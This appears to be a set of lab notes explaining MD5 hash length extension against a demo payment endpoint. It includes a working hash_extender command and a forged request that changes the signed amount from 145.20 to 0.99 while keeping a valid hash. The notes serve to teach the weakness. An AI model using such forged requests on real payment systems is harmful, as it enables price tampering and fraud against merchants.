  3. Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append PADDING starts 0x800000… LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8) Need “data” parameter so it knows how much PADDING and LENGTH to tack on (technically could just be a number but output includes that data) Output differs with length of secret as longer secret -> shorter padding and shorter length, but “new signature” i.e. new hash same as we’re winding on the hash from the same start point (the given hash) with the same data appended
  4. Delimiter stops parameter manipulation when concatenation used Doesn’t stop hash length extension if delimiter known… ---------------------------------------- /hash/pay-delim.php seller_id=1234&reference=widget&amount=145.20&hash=f9243d9e5b806d8bb3e5746024f6c124 App is calculating: MD5($secret + ":1234:widget:145.20") Of course actually it’s calculating: MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH) ./hash_extender --data :1234:widget:145.20 --secret-min 8 --secret-max 12 --append :0.99 --signature f9243d9e5b806d8bb3e5746024f6c124 --format md5 seller_id=1234&reference=widget:145.20%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00&amount=0.99&hash=05c695020d4e3bba16071d6c8b514b3a App calculates MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH + ":0.99")